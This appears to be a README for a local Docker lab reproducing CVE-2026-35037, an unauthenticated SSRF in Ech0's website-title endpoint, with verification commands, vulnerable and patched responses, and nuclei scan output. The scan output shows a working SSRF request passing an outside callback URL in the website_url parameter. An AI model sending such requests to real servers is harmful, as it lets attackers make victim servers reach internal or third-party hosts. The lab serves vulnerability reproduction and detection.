Share
## https://sploitus.com/exploit?id=A76BD209-FD8C-579D-8C51-957EF08DE9B7
# CVE-2026-35037 Ech0 SSRF Lab

This repository contains a local, isolated reproduction lab for `CVE-2026-35037`, an unauthenticated SSRF vulnerability in Ech0's `GET /api/website/title` endpoint.

The lab uses a controlled local evidence server instead of cloud metadata or third-party infrastructure.

## Summary

- Product: `lin-snow/Ech0`
- Vulnerability: Server-Side Request Forgery
- CVE: `CVE-2026-35037`
- GHSA: `GHSA-cqgf-f4x7-g6wc`
- Affected versions: GHSA lists ``
- `nuclei/CVE-2026-35037.yaml`: nuclei template candidate

## Why Build From Source?

Historical vulnerable Docker tags such as `sn0wl1n/ech0:4.2.1` were not available when this lab was created. The lab builds from the official `lin-snow/Ech0` GitHub tags instead:

- `v4.2.1` for the vulnerable candidate
- `v4.2.8` for the patched comparison

The local Dockerfile also avoids upstream build issues observed with the historical `build.Dockerfile`.

## Requirements

- Docker Engine or Docker Desktop
- `curl`
- Optional: `nuclei`

Run this only in a local isolated lab. Do not use these commands against third-party systems. Use only against systems you own or have explicit written authorization to test.

## Reproduce Vulnerable Behavior

Start Ech0 `v4.2.1`:

```bash
ECH0_TAG=4.2.1 docker compose up -d --build
```

Send the controlled verification request:

```bash
sh verify-cve-2026-35037.sh
```

Expected vulnerable response:

```http
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
```

Confirm that Ech0 reached the controlled evidence server:

```bash
docker compose logs evidence
```

Observed evidence log:

```text
ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -
```

## Compare Patched Version

Start Ech0 `v4.2.8`:

```bash
docker compose down -v
ECH0_TAG=4.2.8 docker compose up -d --build
```

Run the same request:

```bash
sh verify-cve-2026-35037.sh
```

Observed patched response:

```http
HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8

{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}
```

## Nuclei Validation

Validate the template:

```bash
nuclei -validate -t nuclei/CVE-2026-35037.yaml
```

Run against vulnerable `v4.2.1`:

```bash
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
```

Observed vulnerable result:

```text
[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.
```

Run against patched `v4.2.8`:

```bash
nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277
```

Observed patched result:

```text
[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.
```

## Cleanup

```bash
docker compose down -v
```

## Notes

- The manual lab uses `http://evidence:8080/` inside the Docker Compose network.
- The nuclei template uses `{{interactsh-url}}` and requires OAST/interactsh support.
- The nuclei template uses `{{interactsh-url}}`, which contacts ProjectDiscovery's interactsh servers such as `oast.online` or `oast.fun` by default. Use `-iserver` to override the server or `-ni` to disable interactsh.
- The lab does not probe cloud metadata endpoints.
- The lab does not contact production or third-party targets except normal dependency/image downloads during Docker build.